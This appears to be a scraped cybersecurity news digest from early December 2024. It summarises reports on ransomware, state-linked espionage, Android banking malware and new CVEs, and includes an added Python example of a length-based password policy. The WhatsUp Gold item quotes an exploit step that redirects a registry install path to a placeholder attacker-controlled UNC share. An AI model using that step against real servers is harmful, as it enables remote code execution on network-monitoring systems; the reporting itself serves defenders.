    Researchers have published a proof-of-concept (PoC) exploit for CVE-2024-8785, a critical remote code execution vulnerability affecting Progress WhatsUp Gold, a popular network monitoring solution for enterprises. CVE-2024-8785 and the PoC exploit CVE-2024-8785 stems from the incorrect use of a privileged application programming interface (API) that may allow attackers to overwrite the Windows Registry. The API endpoint in question – NmAPI.exe – can be exploited by unauthenticated, remote attackers to change an existing registry value or … More

    The post PoC exploit for critical WhatsUp Gold RCE vulnerability released (CVE-2024-8785) appeared first on Help Net Security.

    "

    Autosummary: "


    Australia, Canada, New Zealand, and the U.S. warn of PRC-linked cyber espionage targeting telecom networks

    Telcos
    2024-12-04 https://securityaffairs.com/171644/hacking/prc-linked-cyber-espionage-telecom-networks.html
    Australia, Canada, New Zealand, and the U.S. warn of PRC-linked cyber espionage targeting telecom networks in a joint advisory. Australia, Canada, New Zealand, and the U.S. issued a joint advisory to warn of People’s Republic of China (PRC)-linked cyber espionage targeting telecom networks. “The Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Federal […] "

Autosummary: Australia, Canada, New Zealand, and the U.S. warn of PRC-linked cyber espionage targeting telecom networks (Pierluigi Paganini, December 04, 2024): Australia, Canada, New Zealand, and the U.S. warn of PRC-linked cyber espionage targeting telecom networks in a joint advisory. In September, the Wall Street Journal reported that China-linked APT group Salt Typhoon (also known as FamousSparrow and GhostEmperor) breached U.S. broadband providers, including Verizon, AT&T, and Lumen Technologies, potentially accessing systems for lawful wiretapping and other data. “Specifically, we have identified that PRC-affiliated actors have compromised networks at multiple telecommunications companies to enable the theft of customer call records data, the compromise of private communications of a limited number of individuals who are primarily involved in government or political activity, and the copying of certain information that was subject to U.S. law enforcement requests pursuant to court orders. "


    Russian hackers hijack Pakistani hackers" servers for their own attacks

    rusia-ucrania
    2024-12-04 https://www.bleepingcomputer.com/news/security/russian-turla-hackers-hijack-pakistani-apt-servers-for-cyber-espionage-attacks/
The notorious Russian cyber-espionage group Turla is hacking other hackers, hijacking the Pakistani threat actor Storm-0156's infrastructure to launch their own covert attacks on already compromised networks. [...] "

Autosummary: At the same time, Turla stole data from OilRig's systems, including keylogger logs, directory listings, files, account credentials, and malware builders for private tools such as Neuron. It was determined that in late 2022, Turla had breached multiple C2 nodes of the Storm-0156 threat actor and deployed their own malware payloads, including a TinyTurla backdoor variant, the TwoDash backdoor, the Statuezy clipboard monitor, and the MiniPocket downloader. "


    Japan warns of IO-Data zero-day router flaws exploited in attacks

    exploits
    2024-12-04 https://www.bleepingcomputer.com/news/security/japan-warns-of-io-data-zero-day-router-flaws-exploited-in-attacks/
Japan's CERT is warning that hackers are exploiting zero-day vulnerabilities in I-O Data router devices to modify device settings, execute commands, or even turn off the firewall. [...] "

    Autosummary: The latest available firmware version, v2.1.9, addresses only CVE-2024-52564, and I-O Data states that fixes for the other two vulnerabilities will be made available in v2.2.0, scheduled for release on December 18, 2024. "


    Six password takeaways from the updated NIST cybersecurity framework

    ciber
    2024-12-04 https://www.bleepingcomputer.com/news/security/six-password-takeaways-from-the-updated-nist-cybersecurity-framework/
Updated NIST guidelines reject outdated password security practices in favor of more effective protections. Learn from Specops Software about 6 takeaways from NIST's new guidance that help create strong password policies. [...] "

Autosummary: For example, users often start their passwords with a capital letter (e.g., welcome456 becomes Welcome456) and end their passwords with a number or symbol (e.g., Welcome456, Welcome2024!!). Password length > password complexity: for years, organizations have created password policies that follow a rigid formula, requiring users to include upper and lowercase letters, numbers, and symbols, to create passwords that are difficult to crack. Instead of asking users to come up with a random, difficult-to-remember combination of letters, numbers, and symbols, urge them to create longer passwords or passphrases that will be easy to recall but harder for hackers to guess. "
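What a length-first policy looks like in code, as an added example that is neither Specops nor NIST code: it judges length rather than character classes, rejects anything found in a breached/common-password blocklist (including a dictionary word that has been "decorated" with trailing digits or symbols to satisfy a complexity rule), and flags the predictable shape the article describes. The 15-character minimum, the 64-character maximum, the blocklist contents and the sample passwords are constructed for the illustration.

```python
"""Length-first password policy built from the NIST takeaways above.

Added example; it is not Specops or NIST code. Judge length rather than
character classes, reject values found in a breached/common-password
blocklist, and flag the predictable shape (capitalised word plus trailing
digits or symbols) users adopt when a complexity rule forces them to.
The limits, the blocklist and the sample passwords are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import List, Set

MIN_LENGTH = 15   # assumed floor; choose your own from the guidance
MAX_LENGTH = 64   # assumed ceiling; long passphrases must not be truncated

# Constructed stand-in for a real breached-password list. In production this
# is a large, regularly refreshed corpus, queried exactly or via k-anonymity.
BREACHED_BLOCKLIST: Set[str] = {
    "welcome", "password", "letmein", "qwerty", "summer2024", "changeme",
}

# The shape the article describes: one word, optionally capitalised, padded
# with digits/symbols at the end to satisfy a composition rule.
PREDICTABLE_SHAPE = re.compile(r"^[A-Z]?[a-z]+[0-9!@#$%^&*?.]+$")
TRAILING_DIGITS_SYMBOLS = re.compile(r"[0-9!@#$%^&*?.]+$")
TRAILING_SYMBOLS = re.compile(r"[^a-z0-9]+$")


@dataclass
class PolicyResult:
    accepted: bool
    reasons: List[str] = field(default_factory=list)


def candidate_forms(password: str) -> Set[str]:
    """Forms of the password to look up in the blocklist.

    'Welcome2024!!' yields {'welcome2024!!', 'welcome2024', 'welcome'}, so a
    dictionary word decorated to pass a complexity check is still caught.
    """
    low = password.lower()
    return {low, TRAILING_SYMBOLS.sub("", low), TRAILING_DIGITS_SYMBOLS.sub("", low)}


def evaluate_password(password: str, blocklist: Set[str] = BREACHED_BLOCKLIST) -> PolicyResult:
    """Apply the policy and return every reason for rejection.

    Deliberately absent: any requirement for upper/lower case, digits or
    symbols. Length and the blocklist do the work instead.
    """
    reasons: List[str] = []
    if len(password) < MIN_LENGTH:
        reasons.append(f"shorter than {MIN_LENGTH} characters")
    if len(password) > MAX_LENGTH:
        reasons.append(f"longer than {MAX_LENGTH} characters")
    if candidate_forms(password) & blocklist:
        reasons.append("matches a breached or common password")
    if PREDICTABLE_SHAPE.match(password):
        reasons.append("predictable shape: single word padded with trailing digits/symbols")
    return PolicyResult(accepted=not reasons, reasons=reasons)


if __name__ == "__main__":
    for candidate in ("Welcome456", "Welcome2024!!", "Summer2024!!",
                      "correct horse battery staple", "Tr0ub4dor&3"):
        result = evaluate_password(candidate)
        verdict = "accept" if result.accepted else "reject"
        print(f"{candidate!r:32} {verdict:7} {'; '.join(result.reasons)}")
```

Note what the composition-free rule set does to the article's examples: Welcome456 and Welcome2024!! both fail three ways (too short, blocklisted once the suffix is stripped, predictable shape), while a four-word passphrase with no digits or symbols at all passes.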


Crypto's rising value likely to bring new wave of scams

    financial
    2024-12-04 https://www.malwarebytes.com/blog/news/2024/12/cryptos-rising-value-likely-to-bring-new-wave-of-scams
    The value of cryptocurrencies is going through the roof, so the scammers are even more interested in your funds "

Autosummary: By siphoning your money out of your accounts, and by sometimes even fabricating false “returns” on your investments, the cybercriminals are slowly building trust from you, only to yank away all your money at a later date. Remember, if a celebrity or public figure is suddenly making large promises on specific, individual cryptocurrencies, be cautious about their claims. "


    Ransomware-hit vodka maker Stoli files for bankruptcy in the United States

    financial exploits government
    2024-12-04 https://www.exponential-e.com/blog/ransomware-hit-vodka-maker-stoli-files-for-bankruptcy-in-the-united-states
    Stoli Group USA, the US subsidiary of vodka maker Stoli, has filed for bankruptcy – and a ransomware attack is at least partly to blame. The American branch of Stoli, which imports and distributes Stoli brands in the United States, as well as the Kentucky Owl bourbon brand it purchased in 2017, was hit by a ransomware attack in August 2024. Learn more in my article on the Exponential-e blog. "

    Autosummary: "


    Russia-Linked Turla Exploits Pakistani Hackers" Servers to Target Afghan and Indian Entities

    exploits
    2024-12-04 https://thehackernews.com/2024/12/russia-linked-turla-exploits-pakistani.html
    The Russia-linked advanced persistent threat (APT) group known as Turla has been linked to a previously undocumented campaign that involved infiltrating the command-and-control (C2) servers of a Pakistan-based hacking group named Storm-0156 to conduct its own operations since 2022. The activity, first observed in December 2022, is the latest instance of the nation-state adversary "embedding "

    Autosummary: Turla, also known by the names Blue Python, Iron Hunter, Pensive Ursa, Secret Blizzard (formerly Krypton), Snake, SUMMIT, Uroburos, Venomous Bear, and Waterbug, is assessed to be affiliated with Russia"s Federal Security Service (FSB). "


    UK disrupts Russian money laundering networks used by ransomware

    financial exploits ransomware rusia-ucrania
    2024-12-04 https://www.bleepingcomputer.com/news/security/uk-disrupts-russian-money-laundering-networks-used-by-ransomware/
A law enforcement operation led by the United Kingdom's National Crime Agency (NCA) has disrupted two Russian money laundering networks working with criminals worldwide, including ransomware gangs. [...] "

Autosummary: As part of this Operation Destabilise, U.K. law enforcement has collaborated with many international partners, including the U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC), the FBI, the Drug Enforcement Administration (DEA), the French Direction Centrale de la Police Judiciaire, and Ireland's national police and security service, An Garda Síochána (AGS). "


    BT unit took servers offline after Black Basta ransomware breach

    exploits ransomware
    2024-12-04 https://www.bleepingcomputer.com/news/security/bt-conferencing-division-took-servers-offline-after-black-basta-ransomware-attack/
    Multinational telecommunications giant BT Group (formerly British Telecom) has confirmed that its BT Conferencing business division shut down some of its servers following a Black Basta ransomware breach. [...] "

Autosummary: Some of its most notable victims include U.S. healthcare giant Ascension, U.K. tech outsourcing firm Capita, German defense contractor Rheinmetall, government contractor ABB, Hyundai's European division, the Toronto Public Library, the American Dental Association, and Yellow Pages Canada. "


    New DroidBot Android banking malware spreads across Europe

    financial exploits
    2024-12-04 https://www.bleepingcomputer.com/news/security/new-droidbot-android-banking-malware-spreads-across-europe/
    A new Android banking malware named "DroidBot" attempts to steal credentials for over 77 cryptocurrency exchanges and banking apps in the UK, Italy, France, Spain, and Portugal. [...] "

    Autosummary: Among the 77 apps DroidBot attempts to steal credentials, some standouts include Binance, KuCoin, BBVA, Unicredit, Santander, Metamask, BNP Paribas, Credit Agricole, Kraken, and Garanti BBVA. "


    White House: Salt Typhoon hacked telcos in dozens of countries

    Telcos
    2024-12-04 https://www.bleepingcomputer.com/news/security/white-house-salt-typhoon-hacked-telcos-in-dozens-of-countries/
Chinese state hackers, known as Salt Typhoon, have breached telecommunications companies in dozens of countries, President Biden's deputy national security adviser Anne Neuberger said today. [...] "

    Autosummary: Released with the FBI, the NSA, and international partners, this joint advisory includes tips on hardening network security to shrink the attack surface targeted by the Chinese state hackers, including unpatched devices, vulnerable services exposed to online access, and generally less-secured environments. "


    New DroidBot Android malware targets 77 banking, crypto apps

    financial exploits
    2024-12-04 https://www.bleepingcomputer.com/news/security/new-droidbot-android-malware-targets-77-banking-crypto-apps/
    A new Android banking malware named "DroidBot" attempts to steal credentials for over 77 cryptocurrency exchanges and banking apps in the UK, Italy, France, Spain, and Portugal. [...] "

    Autosummary: Among the 77 apps DroidBot attempts to steal credentials, some standouts include Binance, KuCoin, BBVA, Unicredit, Santander, Metamask, BNP Paribas, Credit Agricole, Kraken, and Garanti BBVA. "


    Russian hackers hijack Pakistani hackers" servers for their own attacks

    rusia-ucrania
    2024-12-04 https://www.bleepingcomputer.com/news/security/russian-hackers-hijack-pakistani-hackers-servers-for-their-own-attacks/
The notorious Russian cyber-espionage group Turla is hacking other hackers, hijacking the Pakistani threat actor Storm-0156's infrastructure to launch their own covert attacks on already compromised networks. [...] "

Autosummary: At the same time, Turla stole data from OilRig's systems, including keylogger logs, directory listings, files, account credentials, and malware builders for private tools such as Neuron. It was determined that in late 2022, Turla had breached multiple C2 nodes of the Storm-0156 threat actor and deployed their own malware payloads, including a TinyTurla backdoor variant, the TwoDash backdoor, the Statuezy clipboard monitor, and the MiniPocket downloader. "


    Black Basta ransomware gang hit BT Group

    exploits ransomware
    2024-12-04 https://securityaffairs.com/171668/breaking-news/black-basta-ransomware-attack-bt-group.html
    BT Group (formerly British Telecom)’s Conferencing division shut down some of its servers following a Black Basta ransomware attack. British multinational telecommunications holding company BT Group (formerly British Telecom) announced it has shut down some of its servers following a Black Basta ransomware attack. “We identified an attempt to compromise our BT Conferencing platform. This […] "

Autosummary: The group claimed to have stolen 500GB of data including financial data, organisation data, user data and personal documents, NDAs, confidential data, and more. "


    Treat AI like a human: Redefining cybersecurity

    ciber
    2024-12-03 https://www.helpnetsecurity.com/2024/12/03/doug-kersten-appfire-ai-oversight/

    In this Help Net Security interview, Doug Kersten, CISO of Appfire, explains how treating AI like a human can change the way cybersecurity professionals use AI tools. He discusses how this shift encourages a more collaborative approach while acknowledging AI’s limitations. Kersten also discusses the need for strong oversight and accountability to ensure AI aligns with business goals and remains secure. Treating AI like a human can accelerate its development. Could you elaborate on how … More

    The post Treat AI like a human: Redefining cybersecurity appeared first on Help Net Security.

    "

Autosummary: Like humans, AI, while powerful, is not infallible—it can make mistakes, propagate biases, or produce outputs that don’t align with organizational goals. While AI can provide valuable insights and automate critical functions, humans—across technical, security, legal, and leadership teams—must ensure that accountability is upheld when mistakes occur. AI models are only as good as the data they consume, and if that data is incomplete, biased, or outdated, the outputs may be flawed. Security leaders, legal teams, and compliance officers must collaborate to create governance structures that ensure proper accountability for AI-driven decisions, especially in sensitive areas like cybersecurity. "


    Cybersecurity jobs available right now: December 3, 2024

    ciber
    2024-12-03 https://www.helpnetsecurity.com/2024/12/03/cybersecurity-jobs-available-right-now-december-3-2024/

Application Security Engineer, TE Connectivity | USA | Remote: As an Application Security Engineer, you will design, develop, and implement a robust Application Security program. Create and maintain application security policies, standards, and procedures. Participate in the incident response process, focusing on application-related security incidents. Investigate and analyze security breaches and provide actionable recommendations to prevent recurrence.
Cryptography engineer, Leonar | France | On-site: As a Cryptography … More

    The post Cybersecurity jobs available right now: December 3, 2024 appeared first on Help Net Security.

    "

Autosummary:
Cyber Defense Specialist, MSC Cruises | Italy | On-site: As a Cyber Defense Specialist, you will operate and optimize security tooling/products, including security email gateway, firewall, IDS/IPS, web security gateway, emergency detect and response, logging and auditing, event and incident management, privileged access management and authentication.
Offensive Security Engineer, Cyberbit | Israel | On-site: As an Offensive Security Engineer, you will design, build, and implement red team labs, vulnerable websites, CTF challenges, and exercises tailored for varying skill levels, covering offensive security concepts, AWS-based infrastructure, and Docker deployments.
Manager, Threat Detection & Penetration Testing, Stripe | USA | Remote: As a Manager, Threat Detection & Penetration Testing, you will lead, mentor, and support a team of threat analysts and penetration testers in detecting, analyzing, and mitigating security threats.
Cyber Analyst, Digital Forensics Incident Response, At-Bay | USA | Remote: As a Cyber Analyst, Digital Forensics Incident Response, you will investigate cyber incidents, analyze evidence, and assist in recovery efforts, including threat actor negotiations. "


    Hawaii woman Hannah Kobayashi spotted entering Mexico - police

    latam
    2024-12-03 https://www.bbc.com/news/articles/c5y7819j500o
    Police say Ms Kobayashi is now considered to be "voluntarily missing" and is not in danger. "

    Autosummary: "The lack of communication surrounding some important details has left us feeling excluded from potentially crucial developments,” her sister, Sydni Kobayashi, said in a statement, according to the Times. "


    BootKitty Linux UEFI bootkit spotted exploiting LogoFAIL flaws

    exploits Linux
    2024-12-03 https://securityaffairs.com/171606/malware/bootkitty-logofail-flaws.html
    The ‘Bootkitty’ Linux UEFI bootkit exploits the LogoFAIL flaws (CVE-2023-40238) to target systems using vulnerable firmware. Cybersecurity researchers from ESET recently discovered the first UEFI bootkit designed to target Linux systems, called by its authors Bootkitty. The bootkit allows attackers to disable the kernel’s signature verification feature and to preload two as yet unknown ELF […] "

    Autosummary: Bootkitty exploits LogoFAIL via tampered BMP files to inject shellcode, bypass Secure Boot, and target specific devices from different manufacturers, including Acer, HP, Fujitsu, and Lenovo. "


    No guarantees of payday for ransomware gang that claims to have hacked children’s hospital

    exploits ransomware
    2024-12-03 https://www.bitdefender.com/en-us/blog/hotforsecurity/no-guarantees-of-payday-for-ransomware-gang-that-claims-to-have-hacked-childrens-hospital
What is the point of INC Ransom's attack on Alder Hey? They are not likely to be paid, and the attack on a children's hospital only increases the chances that they will one day find their collars felt by law enforcement. Read more in my article on the Hot for Security blog. "

Autosummary: Fortunately, Alder Hey Children's Hospital says that it continues to operate as normal, and that patients' care has not been disrupted as a result of the suspected data breach, in what appears to be the latest in a string of ransomware attacks against NHS organisations. "


    US government, energy sector contractor hit by ransomware

    exploits government ransomware industry
    2024-12-03 https://www.helpnetsecurity.com/2024/12/03/englobal-ransomware-attack/

    ENGlobal, a Texas-based engineering and automation contractor for companies in the energy sector, has had its data encrypted by attackers. “On November 25, 2024, ENGlobal Corporation (the “Company”) became aware of a cybersecurity incident. The preliminary investigation has revealed that a threat actor illegally accessed the Company’s information technology (“IT”) system and encrypted some of its data files,” the company shared in an 8-K filed on Monday with the US Securities and Exchange Commission. The … More

    The post US government, energy sector contractor hit by ransomware appeared first on Help Net Security.

    "

    Autosummary: "


    NachoVPN Tool Exploits Flaws in Popular VPN Clients for System Compromise

    exploits
    2024-12-03 https://thehackernews.com/2024/12/nachovpn-tool-exploits-flaws-in-popular.html
    Cybersecurity researchers have disclosed a set of flaws impacting Palo Alto Networks and SonicWall virtual private network (VPN) clients that could be potentially exploited to gain remote code execution on Windows and macOS systems. "By targeting the implicit trust VPN clients place in servers, attackers can manipulate client behaviours, execute arbitrary commands, and gain high levels of access "

    Autosummary: An insufficient certificate validation vulnerability impacting Palo Alto Networks GlobalProtect for Windows, macOS, and Linux that allows the app to be connected to arbitrary servers, leading to the deployment of malicious software (Addressed in version 6.2.6 for Windows) (CVSS score: 5.6) - "


    North Korean Kimsuky Hackers Use Russian Email Addresses for Credential Theft Attacks

    rusia-ucrania
    2024-12-03 https://thehackernews.com/2024/12/north-korean-kimsuky-hackers-use.html
    The North Korea-aligned threat actor known as Kimsuky has been linked to a series of phishing attacks that involve sending email messages that originate from Russian sender addresses to ultimately conduct credential theft. "Phishing emails were sent mainly through email services in Japan and Korea until early September," South Korean cybersecurity company Genians said. "Then, from mid-September, "

    Autosummary: "


    Energy industry contractor ENGlobal Corporation discloses a ransomware attack

    exploits ransomware industry
    2024-12-03 https://securityaffairs.com/171617/cyber-crime/englobal-corporation-disclosed-a-ransomware-attack.html
    ENGlobal Corporation disclosed a ransomware attack, discovered on November 25, disrupting operations, in a filing to the SEC. A ransomware attack disrupted the operations of a major energy industry contractor, ENGlobal Corporation. Founded in 1985, ENGlobal Corporation designs automated control systems for commercial and government sectors, reporting $6 million in Q3 revenue and $18.4 million […] "

Autosummary: Energy industry contractor ENGlobal Corporation discloses a ransomware attack (Pierluigi Paganini, December 03, 2024): ENGlobal Corporation disclosed a ransomware attack, discovered on November 25, disrupting operations, in a filing to the SEC. "


    Poland probes Pegasus spyware abuse under the PiS government

    government
    2024-12-03 https://securityaffairs.com/171611/intelligence/poland-probes-pegasus-spyware-abuse-under-the-pis-government.html
    Poland probes Pegasus spyware abuse under the PiS government; ex-security chief Piotr Pogonowski arrested to testify before parliament. Poland’s government has been investigating the alleged misuse of Pegasus spyware by the previous administration and arrested the former head of Poland’s internal security service Piotr Pogonowski. News of the arrest of Piotr Pogonowski was first reported by the […] "

Autosummary: Poland probes Pegasus spyware abuse under the PiS government (Pierluigi Paganini, December 03, 2024): Poland probes Pegasus spyware abuse under the PiS government; ex-security chief Piotr Pogonowski arrested to testify before parliament. "


    Veeam plugs serious holes in Service Provider Console (CVE-2024-42448, CVE-2024-42449)

    Telcos
    2024-12-03 https://www.helpnetsecurity.com/2024/12/03/vspc-vulnerabilities-cve-2024-42448-cve-2024-42449/

Veeam has fixed two vulnerabilities in Veeam Service Provider Console (VSPC), one of which (CVE-2024-42448) may allow remote attackers to achieve code execution on the VSPC server machine. The vulnerabilities Veeam Service Provider Console is a cloud-enabled platform that allows enterprises to manage and monitor backup operations across their offices. It’s also used by service providers to deliver Backup-as-a-Service (BaaS) and Disaster Recovery-as-a-Service (DRaaS) services to customers. The solution uses management agents to interact with … More

    The post Veeam plugs serious holes in Service Provider Console (CVE-2024-42448, CVE-2024-42449) appeared first on Help Net Security.



    Whitepaper: 9 traits of effective cybersecurity leaders of tomorrow

    ciber
    2024-12-03 https://www.helpnetsecurity.com/2024/12/03/isc2-security-leaders-traits-whitepaper/

    The cyber world needs your expertise. However, the security leaders of tomorrow require a broad set of skills that job experience alone does not arm you with. What do organizations demand? And how can you acquire the technical and soft skills that drive business prosperity? Download the whitepaper to: overcome cybersecurity challenges putting enterprise success at risk; make a positive and lasting impact; explore the 9 key characteristics of effective leaders in the field; fill …

    The post Whitepaper: 9 traits of effective cybersecurity leaders of tomorrow appeared first on Help Net Security.



    Cisco Warns of Exploitation of Decade-Old ASA WebVPN Vulnerability

    exploits
    2024-12-03 https://thehackernews.com/2024/12/cisco-warns-of-exploitation-of-decade.html
    Cisco on Monday updated an advisory to warn customers of active exploitation of a decade-old security flaw impacting its Adaptive Security Appliance (ASA). The vulnerability, tracked as CVE-2014-2120 (CVSS score: 4.3), concerns a case of insufficient input validation in ASA’s WebVPN login page that could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack



    US shares tips to block hackers behind recent telecom breaches

    Telcos
    2024-12-03 https://www.bleepingcomputer.com/news/security/us-shares-tips-to-block-hackers-behind-recent-telecom-breaches/
    CISA released guidance today to help network defenders harden their systems against attacks coordinated by the Salt Typhoon Chinese threat group that breached multiple major global telecommunications providers earlier this year. [...]

    Autosummary: Other hardening best practices highlighted in today’s advisory include: patching and upgrading devices promptly; disabling all unused, unauthenticated, or unencrypted protocols; limiting management connections and privileged accounts; using and storing passwords securely; using only strong cryptography.


    Exploit released for critical WhatsUp Gold RCE flaw, patch now

    exploits
    2024-12-03 https://www.bleepingcomputer.com/news/security/exploit-released-for-critical-whatsup-gold-rce-flaw-patch-now/
    A proof-of-concept (PoC) exploit for a critical-severity remote code execution flaw in Progress WhatsUp Gold has been published, making it critical to install the latest security updates as soon as possible. [...]

    Autosummary: "Through the UpdateFailoverRegistryValues operation, the attacker can change an existing registry value or create a new one for any registry path under HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Ipswitch\." "Specifically, the attacker can change HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Ipswitch\Network Monitor\WhatsUp Gold\Setup\InstallDir to a UNC path pointing to a host controlled by the attacker (i.e., \\<attacker-ip>\share\WhatsUp)."


    Veeam warns of critical RCE bug in Service Provider Console

    exploits Telcos
    2024-12-03 https://www.bleepingcomputer.com/news/security/veeam-warns-of-critical-rce-bug-in-service-provider-console/
    Veeam released security updates today to address two Service Provider Console (VSPC) vulnerabilities, including a critical remote code execution (RCE) discovered during internal testing. [...]



    Repeat offenders drive bulk of tech support scams via Google Ads

    financial
    2024-12-03 https://www.malwarebytes.com/blog/scams/2024/12/repeat-offenders-drive-bulk-of-tech-support-scams-via-google-ads
    Consumers are getting caught in a web of scams facilitated by online ads often originating from the same perpetrators.

    Autosummary: Search for help, find a scam. Search engines, and Google’s in particular, are our gateway to the web. Somewhere far in Asia, someone in a call centre is waiting to welcome the next victim by starting with “Hi, welcome to PayPal support, my name is John, how can I help you?”


    Vodka maker Stoli files for bankruptcy in US after ransomware attack

    financial exploits ransomware
    2024-12-03 https://www.bleepingcomputer.com/news/security/vodka-maker-stoli-files-for-bankruptcy-in-us-after-ransomware-attack/
    Stoli Group’s U.S. companies have filed for bankruptcy following an August ransomware attack and Russian authorities seizing the company’s remaining distilleries in the country. [...]



    The ASA flaw CVE-2014-2120 is being actively exploited in the wild

    exploits
    2024-12-03 https://securityaffairs.com/171631/hacking/cisco-asa-flaw-cve-2014-2120-exploited-in-the-wild.html
    Cisco warns customers that a decade-old ASA vulnerability, tracked as CVE-2014-2120, is being actively exploited in the wild. Cisco warns that the decade-old ASA vulnerability CVE-2014-2120 is being actively exploited in attacks in the wild, and urges customers to review the updated advisory. The vulnerability resides in the WebVPN login page of Cisco Adaptive Security […]



    Gang jailed over cocaine smuggled from Colombia in banana boxes

    latam
    2024-12-03 https://www.bbc.com/news/articles/c3e8pvg284no
    More than two tonnes of the Class A drug was seized in a shipment from Colombia to the UK in 2021.

    Autosummary: Kuci, described as a "trusted member of the operation", was jailed for 21 years and Diko, who also moved to the UK from Albania and had worked as a mechanic, for 18 years.


    No company too small for Phobos ransomware gang, indictment reveals

    exploits ransomware
    2024-12-02 https://www.malwarebytes.com/blog/news/2024/12/no-company-too-small-for-phobos-ransomware-gang-indictment-reveals
    The US indictment against an alleged Phobos ransomware kingpin reveals that no company was too small for the cybercriminal gang to hit.

    Autosummary: Ptitsyn, who was extradited to the United States out of South Korea, now faces 13 counts, which include wire fraud, conspiracy to commit wire fraud, and conspiracy to commit computer fraud and abuse, along with four counts each of causing intentional damage to protected computers and extortion in relation to hacking.


    Radiant Logic provides continuous identity hygiene assessments via real-time streaming data

    ransomware
    2024-12-02 https://www.helpnetsecurity.com/2024/12/02/radiant-logic-identity-assessments/

    Radiant Logic announces the expansion of its central intelligence hub solution, RadiantOne, to now include Identity Observability. Building on the identity security foundation of Identity Data Management and Identity Analytics, Identity Observability allows the world’s most complex organizations to access an intuitive map of their entire identity infrastructure with 360° continuously streaming visibility, an intelligent risk collaboration hub, and seamless AI-powered risk remediation workflows. For large organizations wrestling with identity sprawl or legacy architectures, the …

    The post Radiant Logic provides continuous identity hygiene assessments via real-time streaming data appeared first on Help Net Security.



    A Guide to Securing AI App Development: Join This Cybersecurity Webinar

    ciber
    2024-12-02 https://thehackernews.com/2024/12/a-guide-to-securing-ai-app-development.html
    Artificial Intelligence (AI) is no longer a far-off dream—it’s here, changing the way we live. From ordering coffee to diagnosing diseases, it’s everywhere. But while you’re creating the next big AI-powered app, hackers are already figuring out ways to break it. Every AI app is an opportunity—and a potential risk. The stakes are huge: data leaks, downtime, and even safety threats if security

    Autosummary: Titled "Building Tomorrow, Securely: Securing the Use of AI in App Development," this session will arm you with the knowledge and tools to tackle the challenges of AI-powered innovation.


    THN Recap: Top Cybersecurity Threats, Tools and Tips (Nov 25 - Dec 1)

    ciber
    2024-12-02 https://thehackernews.com/2024/12/thn-recap-top-cybersecurity-threats.html
    Ever wonder what happens in the digital world every time you blink? Here’s something wild - hackers launch about 2,200 attacks every single day, which means someone’s trying to break into a system somewhere every 39 seconds. And get this - while we’re all worried about regular hackers, there are now AI systems out there that can craft phishing emails so convincingly, that even cybersecurity

    Autosummary: The list includes: CVE-2024-11680 (ProjectSend), CVE-2023-28461 (Array Networks AG and vxAG), CVE-2024-10542, CVE-2024-10781 (Spam protection, Anti-Spam, and FireWall plugin), CVE-2024-49035 (Microsoft Partner Center), CVE-2024-49806, CVE-2024-49803, CVE-2024-49805 (IBM Security Verify Access Appliance), CVE-2024-50357 (FutureNet NXR routers), CVE-2024-52338 (Apache Arrow R package), CVE-2024-52490 (Pathomation), CVE-2024-8672 (Widget Options – The #1 WordPress Widget & Block Control plugin), CVE-2024-11103 (Contest Gallery plugin), CVE-2024-42327 (Zabbix), and CVE-2024-53676 (Hewlett Packard Enterprise Insight Remote Support). Since at least May 2024, the group has been found to quickly embrace and modify existing ransomware builders such as AzzaSec, Diamond, Doubleface (aka Invisible), LockBit, Chaos, and Babuk to launch its attacks. RomCom Exploits Mozilla Firefox and Windows 0-Days: The Russia-aligned threat actor known as RomCom chained two zero-day security flaws in Mozilla Firefox (CVE-2024-9680, CVSS score: 9.8) and Microsoft Windows (CVE-2024-49039, CVSS score: 8.8) as part of attacks designed to deliver the eponymous backdoor on victim systems without requiring any user interaction. Ideal for threat hunting, incident response, and security operations, it streamlines integration, ensures rapid deployment of updated detection rules, and supports multiple backends via pySigma. According to data collected by Corvus, RansomHub, Play, LockBit 3.0, MEOW, and Hunters International have accounted for 40% of all attacks observed in Q3 2024. 🔒 Tip of the Week: Your Screenshots Are Secretly Talking Behind Your Back — every screenshot you share could reveal your device info, location, OS version, username, and even internal system paths without your knowledge. Cybersecurity firm Morphisec said it identified five significant NTLM vulnerabilities that could be exploited to leak the credentials via Malicious RTF Document Auto Link in Microsoft Word, Remote Image Tag in Microsoft Outlook, Remote Table Refresh in Microsoft Access, Legacy Player Files in Microsoft Media Player, and Remote Recipient List in Microsoft Publisher.


    8 Million Android Users Hit by SpyLoan Malware in Loan Apps on Google Play

    exploits
    2024-12-02 https://thehackernews.com/2024/12/8-million-android-users-hit-by-spyloan.html
    Over a dozen malicious Android apps identified on the Google Play Store that have been collectively downloaded over 8 million times contain malware known as SpyLoan, according to new findings from McAfee Labs. "These PUP (potentially unwanted programs) applications use social engineering tactics to trick users into providing sensitive information and granting extra mobile app permissions, which "

    Autosummary: Préstamo Seguro-Rápido, seguro (com.prestamoseguro.ss); Préstamo Rápido-Credit Easy (com.voscp.rapido); ได้บาทง่ายๆ-สินเชื่อด่วน (com.uang.belanja); RupiahKilat-Dana cair (com.rupiahkilat.best); ยืมอย่างมีความสุข – เงินกู้ (com.gotoloan.cash); เงินมีความสุข – สินเชื่อด่วน (com.hm.happy.money); KreditKu-Uang Online (com.kreditku.kuindo); Dana Kilat-Pinjaman kecil (com.winner.rupiahcl); Cash Loan-Vay tiền (com.vay.cashloan.cash); RapidFinance (com.restrict.bright.cowboy); PrêtPourVous (com.credit.orange.enespeces.mtn.ouest.wave.argent.tresor.payer.pret); Huayna Money – Préstamo Rápido (com.huaynamoney.prestamos.creditos.peru.loan.credit); IPréstamos: Rápido Crédito (com.credito.iprestamos.dinero.en.linea.chile); ConseguirSol-Dinero Rápido (com.conseguir.sol.pe); ÉcoPrêt Prêt En Ligne (com.pret.loan.ligne.personnel). Some of these apps have been promoted through posts on social media platforms like Facebook, indicating the various methods threat actors are using to trick prospective victims into installing them.


    SmokeLoader Malware Resurfaces, Targeting Manufacturing and IT in Taiwan

    exploits industry
    2024-12-02 https://thehackernews.com/2024/12/smokeloader-malware-resurfaces.html
